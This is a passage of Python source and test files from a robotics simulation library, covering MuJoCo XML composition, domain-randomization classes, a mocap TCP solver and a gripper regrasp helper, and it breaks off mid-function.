assert env.parameters.robot_control_params.control_mode == ControlMode.JOINT
assert env.action_space.shape == (7,)
```
#### File: robogym/mujoco/mujoco_xml.py
```python
import os.path
import typing
import xml.etree.ElementTree as et
import mujoco_py
import numpy as np
ASSETS_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), "../assets"))
XML_DIR = os.path.join(ASSETS_DIR, "xmls")
def _format_array(np_array, precision=6):
""" Format numpy array into a nice string suitable for mujoco XML """
if not isinstance(np_array, np.ndarray):
np_array = np.array(np_array, dtype=float)
# Make sure it's flattened
if len(np_array.shape) > 1:
np_array = np_array.reshape(-1)
if np.min(np.abs(np_array)) > 0.001:
format_str = "{:.%df}" % precision
else:
format_str = "{:.%de}" % precision
# Finally format a string out of numpy array
return " ".join(format_str.format(x) for x in np_array)
class StaleMjSimError(Exception):
"""
Exception indicating the MjSim instance is stale and should no longer be used.
"""
pass
class MjSim(mujoco_py.MjSim):
"""
There are environments, e.g. the rearrange environment, which recreate the
sim after each env reset. This can cause subtle bugs when other components
still cache an instance of the old sim. These bugs are usually quite tricky
to find. This class makes them easier to find by allowing the sim instance
to be invalidated, so that any access to properties of a stale sim instance
raises an error.
"""
__slots__ = ("_stale", "_xml")
def __init__(self, model, **kwargs):
# Note: we don't need to call super().__init__ because MjSim uses __cinit__
# for initialization which happens automatically before subclass __init__
# is called.
self._stale: bool = False
self._xml = model.get_xml()
def get_xml(self):
"""
Mujoco's internal get_xml() is unreliable as it seems to overwrite the internal
memory buffer when more than one sim is instantiated. We therefore cache the model
xml on creation.
:return: the cached model XML string.
"""
return self._xml
def set_stale(self):
"""
Set this sim instance as stale so further access to properties of this
instance will raise an error.
"""
self._stale = True
def is_stale(self):
return self._stale
@property
def data(self):
self._ensure_not_stale()
return super().data
@property
def model(self):
self._ensure_not_stale()
return super().model
def _ensure_not_stale(self):
if self._stale:
raise StaleMjSimError(
"You are accessing property of a stale sim instance which is no longer used"
"by the environment."
)
class MujocoXML:
"""
Class that combines multiple MuJoCo XML files into a single one.
"""
meshdir = os.path.join(ASSETS_DIR, "stls")
texturedir = os.path.join(ASSETS_DIR, "textures")
TEXTURE_ATTRIBUTES = [
"file",
"fileback" "filedown",
"filefront",
"fileleft",
"fileright",
"fileup",
]
NAMED_FIELDS = {
"actuator",
"body1",
"body2",
"childclass",
"class",
"geom",
"geom1",
"geom2",
"joint",
"joint1",
"joint2",
"jointparent",
"material",
"mesh",
"name",
"sidesite",
"site",
"source",
"target",
"tendon",
"texture",
}
###############################################################################################
# CONSTRUCTION
@classmethod
def parse(cls, xml_filename: str):
""" Parse given xml filename into the MujocoXML model """
xml_full_path = os.path.join(XML_DIR, xml_filename)
if not os.path.exists(xml_full_path):
raise Exception(f"MuJoCo XML file not found: {xml_full_path}")
with open(xml_full_path) as f:
xml_root = et.parse(f).getroot()
xml = cls(xml_root)
xml.load_includes(os.path.dirname(os.path.abspath(xml_full_path)))
return xml
@classmethod
def from_string(cls, contents: str):
""" Construct MujocoXML from string """
xml_root = et.XML(contents)
xml = cls(xml_root)
xml.load_includes()
return xml
def __init__(self, root_element: typing.Optional[et.Element] = None):
""" Create new MujocoXML class """
# This is the root element of the XML document we'll be modifying
if root_element is None:
# Create empty root element
self.root_element = et.Element("mujoco")
else:
# Initialize it from the existing thing
self.root_element = root_element
###############################################################################################
# COMBINING MUJOCO ELEMENTS
def add_default_compiler_directive(self):
""" Add a default compiler directive """
self.root_element.append(
et.Element(
"compiler",
{
"meshdir": self.meshdir,
"texturedir": self.texturedir,
"angle": "radian",
"coordinate": "local",
},
)
)
return self
def append(self, other: "MujocoXML"):
""" Append another XML object to this object """
self.root_element.extend(other.root_element)
return self
def xml_string(self):
""" Return combined XML as a string """
return et.tostring(self.root_element, encoding="unicode", method="xml")
def load_includes(self, include_root=""):
"""
Some mujoco files contain includes that need to be processed on our side of the system.
Find all elements that have an 'include' child and inline the referenced files.
"""
for element in self.root_element.findall(".//include/.."):
# Remove in a second pass to avoid modifying list while iterating it
elements_to_remove_insert = []
for idx, subelement in enumerate(element):
if subelement.tag == "include":
# Branch off initial filename
include_path = os.path.join(include_root, subelement.get("file"))
include_element = MujocoXML.parse(include_path)
elements_to_remove_insert.append(
(idx, subelement, include_element.root_element)
)
# Iterate in reversed order to make sure indices are not screwed up
for idx, to_remove, to_insert in reversed(elements_to_remove_insert):
element.remove(to_remove)
to_insert_list = list(to_insert)
# Insert multiple elements
for i in range(len(to_insert)):
element.insert(idx + i, to_insert_list[i])
return self
def _resolve_asset_paths(self, meshdir, texturedir):
"""Resolve relative asset path in xml to local file path."""
for mesh in self.root_element.findall(".//mesh"):
fname = mesh.get("file")
if fname is not None:
if fname[0] != "/":
fname = os.path.join(meshdir or self.meshdir, fname)
mesh.set("file", fname)
for texture in self.root_element.findall(".//texture"):
for attribute in self.TEXTURE_ATTRIBUTES:
fname = texture.get(attribute)
if fname is not None:
if fname[0] != "/":
fname = os.path.join(texturedir or self.texturedir, fname)
texture.set(attribute, fname)
def build(self, output_filename=None, meshdir=None, texturedir=None, **kwargs):
""" Build and return a mujoco simulation """
self._resolve_asset_paths(meshdir, texturedir)
xml_string = self.xml_string()
if output_filename is not None:
with open(output_filename, "wt") as f:
f.write(xml_string)
mj_model = mujoco_py.load_model_from_xml(xml_string)
return MjSim(mj_model, **kwargs)
###############################################################################################
# MODIFICATIONS
def set_objects_attr(self, tag: str = "*", **kwargs):
""" Set given attribute to all instances of given tag within the tree """
for element in self.root_element.findall(".//{}".format(tag)):
for name, value in kwargs.items():
if isinstance(value, (list, np.ndarray)):
value = _format_array(value)
element.set(name, str(value))
return self
def set_objects_attrs(self, tag_args: dict):
"""
Batch version of set_objects_attr where args for multiple tags can be specified as a dict.
"""
for tag, args in tag_args.items():
self.set_objects_attr(tag=tag, **args)
def set_named_objects_attr(self, name: str, tag: str = "*", **kwargs):
""" Sets xml attributes of all objects with given name """
for element in self.root_element.findall(".//{}[@name='{}']".format(tag, name)):
for name, value in kwargs.items():
if isinstance(value, (list, np.ndarray)):
value = _format_array(value)
element.set(name, str(value))
return self
def set_prefixed_objects_attr(self, prefix: str, tag: str = "*", **kwargs):
""" Sets xml attributes of all objects with given name prefix """
for element in self.root_element.findall(".//{}[@name]".format(tag)):
if element.get("name").startswith(prefix): # type: ignore
for name, value in kwargs.items():
if isinstance(value, (list, np.ndarray)):
value = _format_array(value)
element.set(name, str(value))
return self
def add_name_prefix(self, name_prefix: str, exclude_attribs=[]):
"""
Add a given name prefix to all elements with "name" attribute.
Additionally, once we change all "name" attributes we also have to update all
attribute fields that refer to those names.
"""
for element in self.root_element.iter():
for attrib_name in element.keys():
if (
attrib_name not in self.NAMED_FIELDS
or attrib_name in exclude_attribs
):
continue
element.set(attrib_name, name_prefix + element.get(attrib_name)) # type: ignore
return self
def replace_name(self, old_name: str, new_name: str, exclude_attribs=[]):
"""
Replace an old name string with a new name string in the "name" attribute.
"""
for element in self.root_element.iter():
for attrib_name in element.keys():
if (
attrib_name not in self.NAMED_FIELDS
or attrib_name in exclude_attribs
):
continue
element.set(attrib_name, element.get(attrib_name).replace(old_name, new_name)) # type: ignore
return self
def remove_objects_by_tag(self, tag: str):
""" Remove objects with given tag from XML """
for element in self.root_element.findall(".//{}/..".format(tag)):
for subelement in list(element):
if subelement.tag != tag:
continue
assert subelement.tag == tag
element.remove(subelement)
return self
def remove_objects_by_prefix(self, prefix: str, tag: str = "*"):
""" Remove objects with given name prefix from XML """
for element in self.root_element.findall(".//{}[@name]/..".format(tag)):
for subelement in list(element):
if subelement.get("name").startswith(prefix): # type: ignore
element.remove(subelement)
return self
def remove_objects_by_name(
self, names: typing.Union[typing.List[str], str], tag: str = "*"
):
""" Remove object with given name from XML """
if isinstance(names, str):
names = [names]
for name in names:
for element in self.root_element.findall(
".//{}[@name='{}']/..".format(tag, name)
):
for subelement in list(element):
if subelement.get("name") == name:
element.remove(subelement)
return self
```
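A small usage sketch of the stale-sim guard defined above. The minimal XML string is only for illustration and assumes a working mujoco_py installation:
```python
from robogym.mujoco.mujoco_xml import MujocoXML, StaleMjSimError

xml = MujocoXML.from_string("<mujoco><worldbody></worldbody></mujoco>")
old_sim = xml.build()
new_sim = xml.build()  # e.g. the environment rebuilt its simulation on reset
assert not new_sim.is_stale()

old_sim.set_stale()
try:
    old_sim.data  # any further access to the stale instance...
except StaleMjSimError:
    pass          # ...raises instead of silently operating on the wrong sim
```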
#### File: mujoco/test/test_mujoco_utils.py
```python
import random
import numpy as np
from mujoco_py import cymj, functions
from numpy.random.mtrand import _rand as global_randstate
from robogym.mujoco.forward_kinematics import ForwardKinematics
from robogym.mujoco.mujoco_xml import MujocoXML
from robogym.mujoco.simulation_interface import SimulationInterface
from robogym.utils.rotation import uniform_quat
XML_BALL = """
<mujoco>
<worldbody>
<body name="ball">
<freejoint name="ball_joint"/>
<geom name="sphere" pos="0.00 0.00 0.00" type="sphere" size="0.1 0.1 0.1"/>
</body>
</worldbody>
</mujoco>
"""
XML_ARM = """
<mujoco>
<worldbody>
<body name="arm">
<joint type="hinge" name="hinge_joint" axis="0 0 1"/>
<geom name="sphere" pos="0.00 0.00 0.00" type="sphere" size="0.1 0.1 0.1"/>
<body name="forearm" pos="1 0 0">
<joint type="slide" axis="1 0 0" name="slide_joint"/>
<geom name="box" pos="0.00 0.00 0.00" type="box" size="0.1 0.1 0.1"/>
</body>
</body>
</worldbody>
</mujoco>
"""
def test_simple_mujoco_setup():
ball_one = (
MujocoXML.from_string(XML_BALL)
.add_name_prefix("ball_one:")
.set_named_objects_attr("ball_one:ball", pos=[1, 0, 0])
)
ball_two = (
MujocoXML.from_string(XML_BALL)
.add_name_prefix("ball_two:")
.set_named_objects_attr("ball_two:ball", pos=[-1, 0, 0])
)
main = (
MujocoXML().add_default_compiler_directive().append(ball_one).append(ball_two)
)
simulation = SimulationInterface(main.build())
simulation.register_joint_group("ball_one", "ball_one:ball_joint")
simulation.register_joint_group("ball_two", "ball_two:ball_joint")
assert simulation.get_qpos("ball_one").shape == (7,)
assert simulation.get_qpos("ball_two").shape == (7,)
assert simulation.get_qvel("ball_one").shape == (6,)
assert simulation.get_qvel("ball_two").shape == (6,)
qpos1 = np.random.randn(3)
qrot1 = uniform_quat(global_randstate)
qpos1_combined = np.concatenate([qpos1, qrot1])
qpos2 = np.random.randn(3)
qrot2 = uniform_quat(global_randstate)
qpos2_combined = np.concatenate([qpos2, qrot2])
simulation.set_qpos("ball_one", qpos1_combined)
simulation.set_qpos("ball_two", qpos2_combined)
assert np.linalg.norm(simulation.get_qpos("ball_one") - qpos1_combined) < 1e-6
assert np.linalg.norm(simulation.get_qpos("ball_two") - qpos2_combined) < 1e-6
def test_more_complex_mujoco_setup():
xml = (
MujocoXML()
.add_default_compiler_directive()
.append(
MujocoXML.from_string(XML_ARM)
.add_name_prefix("arm_one:")
.set_named_objects_attr("arm_one:ball", pos=[0, 1, 0])
)
.append(
MujocoXML.from_string(XML_ARM)
.add_name_prefix("arm_two:")
.set_named_objects_attr("arm_two:ball", pos=[0, -1, 0])
)
)
simulation = SimulationInterface(xml.build())
simulation.register_joint_group("arm_one", "arm_one:")
simulation.register_joint_group("arm_one_hinge", "arm_one:hinge_joint")
simulation.register_joint_group("arm_two", "arm_two:")
simulation.register_joint_group("arm_two_hinge", "arm_two:hinge_joint")
assert simulation.get_qpos("arm_one").shape == (2,)
assert simulation.get_qvel("arm_one").shape == (2,)
assert simulation.get_qpos("arm_two").shape == (2,)
assert simulation.get_qvel("arm_two").shape == (2,)
assert simulation.get_qpos("arm_one_hinge").shape == (1,)
assert simulation.get_qvel("arm_one_hinge").shape == (1,)
assert simulation.get_qpos("arm_two_hinge").shape == (1,)
assert simulation.get_qvel("arm_two_hinge").shape == (1,)
initial_qpos_one = simulation.get_qpos("arm_one")
initial_qpos_two = simulation.get_qpos("arm_two")
simulation.set_qpos("arm_one_hinge", 0.1)
# Check that we are setting the right hinge joint
assert np.linalg.norm(simulation.get_qpos("arm_one") - initial_qpos_one) > 0.09
assert np.linalg.norm(simulation.get_qpos("arm_two") - initial_qpos_two) < 1e-6
def test_set_attributes_mixed_precision():
main = (
MujocoXML()
.add_default_compiler_directive()
.append(
MujocoXML.from_string(XML_BALL).set_named_objects_attr(
"ball", pos=[1, 1e-8, 1e-12]
)
)
)
simulation = SimulationInterface(main.build())
ball_id = simulation.sim.model.body_name2id("ball")
ball_pos = simulation.sim.model.body_pos[ball_id]
target_pos = np.array([1, 1e-8, 1e-12])
# Test relative error because the absolute error can be quite small either way
assert np.linalg.norm((ball_pos / target_pos) - 1) < 1e-6
def test_forward_kinematics_on_inverted_pendulum():
mxml = MujocoXML.parse(
"test/inverted_pendulum/inverted_double_pendulum.xml"
).add_name_prefix("ivp:")
simulation = SimulationInterface(mxml.build())
simulation.register_joint_group("pendulum", "ivp:")
joint_names = list(map(lambda x: "ivp:%s" % x, ["hinge", "hinge2"]))
site_names = list(map(lambda x: "ivp:%s" % x, ["hinge2_site", "tip"]))
KIN = ForwardKinematics.prepare(
mxml, "ivp:cart", np.zeros(3), np.zeros(3), site_names, joint_names
)
for _ in range(5):
simulation.mj_sim.data.ctrl[0] = random.random()
for _ in range(100):
simulation.step()
simulation.forward()
site_positions = np.array(
[simulation.mj_sim.data.get_site_xpos(site) for site in site_names]
)
joint_pos = simulation.get_qpos("pendulum")
kinematics_positions = KIN.compute(joint_pos, return_joint_pos=True)
assert (np.abs(site_positions - kinematics_positions[:2]) < 1e-6).all()
assert (np.abs(site_positions[0] - kinematics_positions[-1]) < 1e-6).all()
def test_remove_elem():
ball_without_joint = MujocoXML.from_string(XML_BALL).remove_objects_by_tag(
"freejoint"
)
ref_xml = """
<mujoco>
<worldbody>
<body name="ball">
<geom name="sphere" pos="0.00 0.00 0.00" size="0.1 0.1 0.1" type="sphere" />
</body>
</worldbody>
</mujoco>
"""
assert ref_xml.strip() == ball_without_joint.xml_string().strip()
def test_mj_error_callback():
message = None
called = False
def callback(msg):
nonlocal message
message = msg.decode()
raise RuntimeError(message)
cymj.set_error_callback(callback)
try:
with cymj.wrap_mujoco_warning():
functions.mju_error("error")
except RuntimeError as e:
assert e.args[0] == "error"
assert message == "error"
called = True
assert called
```
#### File: robogym/randomization/common.py
```python
import abc
from collections import OrderedDict
from enum import Enum
from typing import Dict, Generic, List, Optional, Tuple, TypeVar
import numpy as np
VType = TypeVar("VType", int, float)
class DType(Enum):
INT = (1,)
FLOAT = 2
class RandomizerParameter(Generic[VType], abc.ABC):
"""
Base interface for randomizer parameter.
"""
INT = DType.INT
FLOAT = DType.FLOAT
def __init__(
self,
name: str,
initial_value: VType,
value_range: Tuple[VType, VType],
delta: Optional[VType] = None,
):
self.name = name
self._value_range: Tuple[VType, VType] = self._convert_range(value_range)
self._value: VType = self._convert_value(initial_value)
self._delta: Optional[VType] = self._convert_delta(delta)
################################################
# External APIs to interact with domain randomization.
def get_value(self) -> VType:
return self._value
def set_value(self, value: VType):
self._value = self._convert_value(value)
def get_range(self) -> Tuple[VType, VType]:
return self._value_range
def get_delta(self) -> Optional[VType]:
return self._delta
@property
@abc.abstractmethod
def dtype(self):
pass
################################################
# Internal methods.
def _convert_value(self, value: VType) -> VType:
low, high = self.get_range()
value = self._convert_type(value)
assert (
low <= value <= high
), ( # type: ignore
f"Value {value} is not within range of [{low}, {high}]"
)
return value
def _convert_range(self, value_range: Tuple[VType, VType]) -> Tuple[VType, VType]:
assert (
len(value_range) == 2
), f"Invalid range {value_range}, must tuple of two values."
low, high = value_range
return self._convert_type(low), self._convert_type(high)
def _convert_delta(self, delta: Optional[VType]):
if delta is not None:
return self._convert_type(delta)
else:
return None
@classmethod
@abc.abstractmethod
def _convert_type(cls, val: VType) -> VType:
pass
def __repr__(self):
return (
f"{self.__class__}(\n"
f"value={self.get_value()}\n"
f"range={self.get_range()}\n"
f")"
)
TType = TypeVar("TType")
class Randomizer(abc.ABC, Generic[TType]):
"""
Base interface for a randomizer.
"""
def __init__(self, name: str, enabled: bool = True):
self.name = name
self._parameters: Dict[str, RandomizerParameter] = OrderedDict()
self._enabled = enabled
def randomize(self, target: TType, random_state: np.random.RandomState) -> TType:
if self._enabled:
return self._randomize(target, random_state)
else:
return target
@abc.abstractmethod
def _randomize(self, target: TType, random_state: np.random.RandomState) -> TType:
pass
def get_parameters(self) -> List[RandomizerParameter]:
"""
Return all parameters for this randomizer.
"""
return list(self._parameters.values())
def get_parameter(self, name: str) -> RandomizerParameter:
"""
Get parameter by name.
"""
assert (
name in self._parameters
), f"Parameter {name} does not exist in randomizer {self.name}."
return self._parameters[name]
def register_parameter(self, parameter: RandomizerParameter):
"""
Register a parameter for this randomizer.
"""
assert (
parameter.name not in self._parameters
), f"Parameter with name {parameter.name} already exists."
self._parameters[parameter.name] = parameter
return parameter
def enable(self):
"""
Enable the randomizer.
"""
self._enabled = True
def disable(self):
self._enabled = False
@property
def enabled(self):
return self._enabled
def reset(self):
"""
Reset state of the randomizer. Called during environment reset.
"""
pass
RType = TypeVar("RType", bound=Randomizer)
class RandomizerCollection(Generic[RType]):
"""
Interface for a collection of randomizers; it provides functionality
to register child randomizers and retrieve their parameters.
"""
def __init__(self):
self._randomizers = OrderedDict()
def register_randomizer(self, randomizer: RType) -> RType:
"""
Add a randomizer to the collection.
"""
assert (
randomizer.name not in self._randomizers
), f"Randomizer with name {randomizer.name} already exists."
self._randomizers[randomizer.name] = randomizer
return randomizer
def get_randomizers(self) -> List[RType]:
"""
Get all randomizers.
"""
return list(self._randomizers.values())
def get_randomizer(self, name) -> RType:
"""
Get randomizer by name.
"""
assert name in self._randomizers, f"Randomizer {name} does not exist"
return self._randomizers[name]
def _get_randomizer_parameters(self) -> List[RandomizerParameter]:
parameters = []
for randomizer in self.get_randomizers():
parameters.extend(randomizer.get_parameters())
return parameters
class ChainedRandomizer(
Randomizer[TType], RandomizerCollection[RType], Generic[TType, RType],
):
"""
Base class for a randomizer which is a composition of multiple randomizers.
During randomize, it applies each randomizer in order to the given target, so
ChainedRandomizer('cr', [r1, r2, r3]).randomize(target) is equivalent to
r3.randomize(r2.randomize(r1.randomize(target))).
"""
def __init__(self, name, randomizers: List[RType]):
Randomizer.__init__(self, name, enabled=True)
RandomizerCollection.__init__(self) # type: ignore
for randomizer in randomizers:
self.register_randomizer(randomizer)
def _randomize(self, target: TType, random_state: np.random.RandomState) -> TType:
for randomizer in self.get_randomizers():
target = randomizer.randomize(target, random_state)
return target
def get_parameters(self):
return self._get_randomizer_parameters()
def reset(self):
for randomizer in self.get_randomizers():
randomizer.reset()
```
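A short sketch of how the pieces above compose. `AddNoise` is a hypothetical randomizer written only for illustration:
```python
import numpy as np

from robogym.randomization.common import ChainedRandomizer, Randomizer

class AddNoise(Randomizer):
    """Hypothetical randomizer that adds Gaussian noise to a numpy target."""

    def __init__(self, name: str, scale: float):
        super().__init__(name)
        self.scale = scale

    def _randomize(self, target, random_state):
        return target + random_state.normal(scale=self.scale, size=target.shape)

# Applied left to right: the "coarse" noise is added after the "fine" noise.
chained = ChainedRandomizer("noise", [AddNoise("fine", 0.01), AddNoise("coarse", 0.1)])
out = chained.randomize(np.zeros(3), np.random.RandomState(0))
assert out.shape == (3,)
```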
#### File: randomization/tests/test_randomization.py
```python
import unittest
import attr
import numpy as np
from robogym.randomization.env import (
EnvActionRandomizer,
EnvObservationRandomizer,
EnvParameterRandomizer,
EnvRandomization,
EnvSimulationRandomizer,
build_randomizable_param,
)
from robogym.randomization.observation import ObservationRandomizer
from robogym.randomization.parameters import FloatRandomizerParameter
class DummyRandomizerParameter(FloatRandomizerParameter):
def __init__(self, name, val):
super().__init__(
name, val, value_range=(-1.0, 1.0), delta=1.0,
)
@attr.s(auto_attribs=True)
class DummyNestedEnvParameter:
c: int = build_randomizable_param(1, low=-3, high=3)
@attr.s(auto_attribs=True)
class DummyEnvParameter:
a: int = build_randomizable_param(0, low=-5, high=5)
b: float = build_randomizable_param(0.0, low=-1.0, high=1.0)
x: int = 0 # Non randomizable parameter.
nested: DummyNestedEnvParameter = DummyNestedEnvParameter()
class DummyObservationRandomizer(ObservationRandomizer):
def __init__(self, name, val):
super().__init__(name)
self.val = self.register_parameter(val)
def _randomize(self, target, random_state):
target[self.val.name] = self.val.get_value()
return target
class TestRandomization(unittest.TestCase):
def setUp(self):
super().setUp()
self.random_state = np.random.RandomState()
def test_randomizer_parameters(self):
parameter = DummyRandomizerParameter("foo", 0.0)
assert parameter.get_value() == 0.0
assert parameter.get_range() == (-1.0, 1.0)
assert parameter.get_delta() == 1.0
parameter.set_value(1.0)
assert parameter.get_value() == 1.0
def test_randomizer_basic(self):
"""
Test functionality of basic randomizer.
"""
randomizer = EnvParameterRandomizer(DummyEnvParameter())
assert len(randomizer.get_parameters()) == 3
# Make sure register duplicate parameter is not allowed.
with self.assertRaises(AssertionError):
randomizer.register_parameter(DummyRandomizerParameter("a", 1))
randomizer.register_parameter(DummyRandomizerParameter("d", 1))
assert len(randomizer.get_parameters()) == 4
randomizer.get_parameter("a").set_value(1)
randomizer.get_parameter("b").set_value(0.5)
randomizer.get_parameter("c").set_value(2)
parameters = randomizer.randomize(DummyEnvParameter(), self.random_state)
assert parameters.a == 1
assert parameters.b == 0.5
assert parameters.nested.c == 2
randomizer.disable()
parameters = randomizer.randomize(DummyEnvParameter(), self.random_state)
randomizer.get_parameter("a").set_value(1)
assert parameters.a == 0
def test_observation_randomizer(self):
randomizer = EnvObservationRandomizer(
[
DummyObservationRandomizer("r1", DummyRandomizerParameter("foo", 0.0)),
DummyObservationRandomizer("r2", DummyRandomizerParameter("bar", 1.0)),
]
)
assert len(randomizer.get_randomizers()) == 2
assert len(randomizer.get_parameters()) == 2
obs = randomizer.randomize({}, self.random_state)
assert obs["foo"] == 0.0
assert obs["bar"] == 1.0
def test_env_randomization(self):
randomization = EnvRandomization(
parameter_randomizer=EnvParameterRandomizer(DummyEnvParameter()),
observation_randomizer=EnvObservationRandomizer(
[
DummyObservationRandomizer(
"r1", DummyRandomizerParameter("foo", 0.0)
),
]
),
action_randomizer=EnvActionRandomizer([]),
simulation_randomizer=EnvSimulationRandomizer([]),
)
randomization.update_parameter("observation.r1:foo", 0.5)
parameter = randomization.get_parameter("observation.r1:foo")
assert parameter.get_value() == 0.5
```
#### File: control/tcp/mocap_solver.py
```python
from typing import Optional
import numpy as np
from gym.envs.robotics import utils
from robogym.mujoco.simulation_interface import SimulationInterface
from robogym.robot.control.tcp.solver import PrincipalAxis, Solver
from robogym.utils import rotation
class MocapSolver(Solver):
"""
A TCP solver class that uses Mujoco's mocap weld
to track and apply TCP control.
"""
JOINT_MAPPING = {
PrincipalAxis.PITCH: 5,
}
def __init__(
self,
simulation: SimulationInterface,
body_name: str,
robot_prefix: str,
quat_dof_dims: np.ndarray,
alignment_axis: Optional[PrincipalAxis],
):
super().__init__(
simulation, body_name, robot_prefix, quat_dof_dims, alignment_axis
)
def get_tcp_quat(self, ctrl: np.ndarray) -> np.ndarray:
assert len(ctrl) == len(
self.dof_dims
), f"Unexpected control dim {len(ctrl)}, should be {len(self.dof_dims)}"
euler = np.zeros(3)
euler[self.dof_dims_axes] = ctrl
quat = rotation.euler2quat(euler)
gripper_quat = self.mj_sim.data.get_body_xquat(self.body_name)
if self.alignment_axis is not None:
return (
self.align_axis(
rotation.quat_mul(gripper_quat, quat), self.alignment_axis.value
)
- gripper_quat
)
return rotation.quat_mul(gripper_quat, quat) - gripper_quat
def set_action(self, action: np.ndarray) -> None:
utils.mocap_set_action(self.mj_sim, action)
def reset(self):
utils.reset_mocap_welds(self.mj_sim)
utils.reset_mocap2body_xpos(self.mj_sim)
@staticmethod
def align_axis(cmd_quat, axis):
""" Align quaternion into given axes """
alignment = np.zeros(3)
alignment[axis] = 1
mtx = rotation.quat2mat(cmd_quat)
# Axis that is the closest (by dotproduct) to alignment
axis_nr = np.abs((alignment.T @ mtx)).argmax()
# Axis of the cmd_quat
axis = mtx[:, axis_nr]
axis = axis * np.sign(axis @ alignment)
difference_quat = rotation.vectors2quat(axis, alignment)
return rotation.quat_mul(difference_quat, cmd_quat)
```
#### File: gripper/mujoco/regrasp_helper.py
```python
from typing import List, Optional
import numpy as np
class RegraspHelper:
"""
A helper that attempts to facilitate persistent object grasping by a gripper. When the helper
detects backdrive due to neutral commands preceded by a close command on the gripper, it will
re-issue the previous command that is deemed more desirable than the backdrive result, to
prevent objects from slipping due to incomplete grasping control.
"""
def __init__(self, initial_position: np.ndarray):
self.regrasp_command = None # current command that we issue so that we re-grasp
self.prev_obs_position = (
initial_position # previous joint observation (=current val)
)
self.last_nonzero_cmd_direction = None # last user desired trajectory
self.last_nonzero_obs_direction = None # last actual trajectory
self.prev_action = None # last command
self.second_prev_action = None # second to last command
self.debug_regrasp = (
False # set this to True to print debug information for re-grasping
)
if self.debug_regrasp:
self.debug_desired_action_history: List[float] = []
self.debug_desired_action_dir_history: List[str] = []
self.debug_observed_pos_history: List[float] = []
self.debug_observed_pos_dir_history: List[str] = []
self.debug_returned_ctrl_history: List[np.ndarray] = []
@staticmethod
def debug_dir_to_string(direction: Optional[float]):
"""For debugging only, given a float representing a direction, return a human friendly string.
:param direction: Positive for Closing, Negative for Opening and zero for Keeping. None is also accepted.
:return: String representation of the float interpreted as a direction.
"""
if direction is None:
return "None"
elif direction == 0:
return "Keep"
elif direction > 0:
return "Close"
elif direction < 0:
return "Open"
@staticmethod
def debug_add_to_history(
history: List, item: object, max_history: float = 20
) -> None:
"""For debugging only. Adds the given item to the given list, and removes the first object if the list
length becomes bigger than the max history limit. This method will pop at most one item, so it expects
max history limit to be constant.
:param history: List to add the item.
:param item: Item to add.
:param max_history: Limit for the list. This method will pop one item if the list exceeds this limit after
adding the item.
"""
history.append(item)
if len(history) > max_history:
history.pop(0)
def debug_print_regrasp_history(self) -> None:
"""Pretty print the history of debug variables that help debug regrasp."""
print("- - - - -")
print(
f"DesCmdHist : {['{0:0.5f}'.format(i) for i in self.debug_desired_action_history]}"
)
print(f"DesCmdDirHist: {self.debug_desired_action_dir_history}")
print(
f"ObsPosHist : {['{0:0.5f}'.format(i) for i in self.debug_observed_pos_history]}"
)
print(f"ObsPosDirHist: {self.debug_observed_pos_dir_history}")
print(
f"PrevReturns : {['{0:0.5f}'.format(i) for i in self.debug_returned_ctrl_history]}"
)
def compute_regrasp_control(
self,
position_control: np.ndarray,
default_control: np.ndarray,
current_position: np.ndarray,
) -> np.ndarray:
"""
Computes control override if applicable given the current state of gripper and controls
:param position_control: Applied absolute position control
:param default_control: Computed default denormalized control that would apply without re-grasp correction
:param current_position: Current gripper joint position reading
:return: re-grasp corrected control
"""
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# 1) Compute variables that will help us make the re-grasp decision
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# note: some of these variables are not used, but their computation is kept for completeness
# current position delta
assert self.prev_obs_position is not None
obs_move = current_position - self.prev_obs_position
obs_direction = (
0.0 if np.allclose(obs_move, 0, atol=1e-5) else np.sign(obs_move)
)
# what does the user want to do now?
user_wants_to_open = position_control < 0.0
user_wants_to_close = position_control > 0.0
user_wants_to_keep = position_control == 0.0
# what did the user want to do last
# user_last_trajectory_was_opening = self.last_nonzero_cmd_direction and self.last_nonzero_cmd_direction < 0.0
user_last_trajectory_was_closing = (
self.last_nonzero_cmd_direction and self.last_nonzero_cmd_direction > 0.0
)
# what is the gripper doing now? (note this is influenced by the previous command, not the desired command)
gripper_is_opening = obs_direction < 0.0
# gripper_is_closing = obs_direction > 0.0
# gripper_is_still = obs_direction == 0.0
# what was the gripper last trajectory
# gripper_was_opening_or_still = self.last_nonzero_obs_direction and self.last_nonzero_obs_direction < 0.0
gripper_was_closing_or_still = (
self.last_nonzero_obs_direction and self.last_nonzero_obs_direction > 0.0
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# 2) If we are currently regrasping, we have special handling to do first
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
is_regrasping = self.regrasp_command is not None
if is_regrasping:
if user_wants_to_open:
# stop re-grasping
self.regrasp_command = None
elif user_wants_to_close:
# if the user wants to close, let the code continue down. The default behavior for the algorithm
# will compute the user desired control, and compare it to the regrasp, actually enacting the
# user one if re-grasping would have been a worse command (in terms of closing the gripper)
pass
else:
# directly continue re-issuing the same command we decided when we started re-grasping
return self.regrasp_command
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# 3) This is where we decide if we should re-grasp
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# we want to regrasp if all of these are true:
# 1) the user wants to close or keep the position
# 2) the last thing the user wanted to do was closing the gripper (not opening). Being still is ignored here *
# 3) the gripper was indeed closing or staying still after closing
# 4) the gripper is now opening
# Since it was closing, and now opening, and the user wants to close or keep closed, and the gripper did already
# try to close, the fact that everything says that it should be closing, but it is actually opening, hints
# at an external force trying to open it, and we assume here that this is backdrive.
#
# * note on (2). The reason why this matters is because if the user wanted to open, we would expect the gripper
# to open some time after that user command (typically 1-n ticks later depending on current momentum.) Just
# because the user wants to close now we can't expect the gripper to close. In order to expect the gripper
# to close or keep closed, we must require that the last intention was to close from a more open position.
user_wants_to_close_or_keep = user_wants_to_close or user_wants_to_keep
user_expects_close_or_keep = (
user_wants_to_close_or_keep and user_last_trajectory_was_closing
)
if (
user_expects_close_or_keep
and gripper_was_closing_or_still
and gripper_is_opening
):
# This is the command that we will issue as part of the regrasp. Note that instead we could calculate
# force applied on the object. In this case, what we do is re-issue the last command that led to
# a positive move / closing the gripper. Since the last command led to the current opening, we must use at
# least the second-to-last command; given that our algorithm requires past trajectories, we can guarantee
# that it exists by now.
